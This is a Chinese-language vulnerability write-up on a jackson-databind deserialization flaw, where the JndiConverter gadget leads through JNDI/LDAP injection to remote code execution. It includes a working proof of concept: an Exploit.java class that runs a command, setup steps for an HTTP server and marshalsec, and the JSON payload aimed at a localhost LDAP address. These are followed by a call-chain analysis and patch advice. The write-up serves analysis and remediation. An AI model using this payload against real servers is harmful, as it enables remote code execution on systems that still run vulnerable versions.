影响范围
- jackson-databind before 2.9.10.3
- jackson-databind before 2.8.11.5
- jackson-databind before 2.7.9.7
漏洞类型
JDNI注入导致RCE
利用条件
- 开启enableDefaultTyping()
- 使用了org.apache.xbean.propertyeditor.JndiConverter第三方依赖
漏洞概述
2020年2月,jackson-databind在github上更新了一个新的反序列化利用类org.apache.xbean.propertyeditor.JndiConverter,该类绕过了之前jackson-databind维护的黑名单类,并且JDK版本较低的话,可造成RCE。
漏洞复现
环境搭建
pom.xml如下:
<dependencies>
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
<version>2.9.9.1</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.apache.xbean/xbean-reflect -->
<dependency>
<groupId>org.apache.xbean</groupId>
<artifactId>xbean-reflect</artifactId>
<version>4.17</version>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-nop</artifactId>
<version>1.7.2</version>
</dependency>
<!-- https://mvnrepository.com/artifact/javax.transaction/jta -->
<dependency>
<groupId>javax.transaction</groupId>
<artifactId>jta</artifactId>
<version>1.1</version>
</dependency>
</dependencies>
漏洞利用
这里使用LDAP的利用方式进行漏洞的利用演示,RMI的方式也是类似的,且RMI比LDAP要对JDK版本有很大的局限性~
LDAP利用方式:jdk版本:JDK 11.0.1、8u191、7u201、6u211之前,笔者这里采用JDK 1.8.0_181
编译Exploit.java
Exploit.java代码如下:
import java.lang.Runtime;
public class Exploit {
static {
try {
Runtime.getRuntime().exec("calc");
} catch (Exception e) {
e.printStackTrace();
}
}
}
编译Exploit.java文件:
搭建HTTP服务
使用Python搭建简易SimpleHTTPServer服务:
python -m SimpleHTTPServer 4444
搭建LDAP服务
使用marshalsec来启动一个LDAP服务:
执行漏洞POC1
Poc.java代码如下所示:
package com.jacksonTest;
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;
public class Poc {
public static void main(String[] args) throws Exception {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
String payload = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://127.0.0.1:1099/Exploit\"}]";
try {
Object obj = mapper.readValue(payload, Object.class);
} catch (IOException e) {
e.printStackTrace();
}
}
}
之后运行该程序,成功执行命令,弹出计算器:
漏洞分析
首先定位到org.apache.xbean.propertyeditor.JndiConverter类,发现在该类较为简单,且构造函数直接调用父类的构造方法,不过在该类中却调用了lookup对text进行查询,这一点需要留意,看后续是否有与toObjectImpl函数的相关调用点,之后跟进父类AbstractConvert:
在父类中搜索toObjectImpl发现在toObject中有调用,且参数为当前类的text:
之后继续查看toObject的调用,发现在setAsText处调用,且传递的参数为text可控:
综上所述,我们可以指定反序列化类为org.apache.xbean.propertyeditor.JndiConverter,之后指定set方法为asText,之后传递参数为ldap服务地址,之后在setAsText中调用toObject函数,之后在toObject中调用toObjectImp,之后在toObjectImp中执行lookup,从而导致JNDI,最终RCE~
整个利用链如下所示:
mapper.readValue
->AbstractConverter.setAsText
->AbstractConverter.toObject
->JndiConverter.toObjectImpl
->lookup
补丁分析
官方在github的更新方式依旧是添加相关类到黑名单,但这种方式治标不治本,后续可能出现其他绕过黑名单的gdaget:
https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497
修复建议
- 及时将jackson-databind升级到安全版本
- 升级到较高版本的JDK。
参考链接
https://github.com/FasterXML/jackson-databind/issues/2620
https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497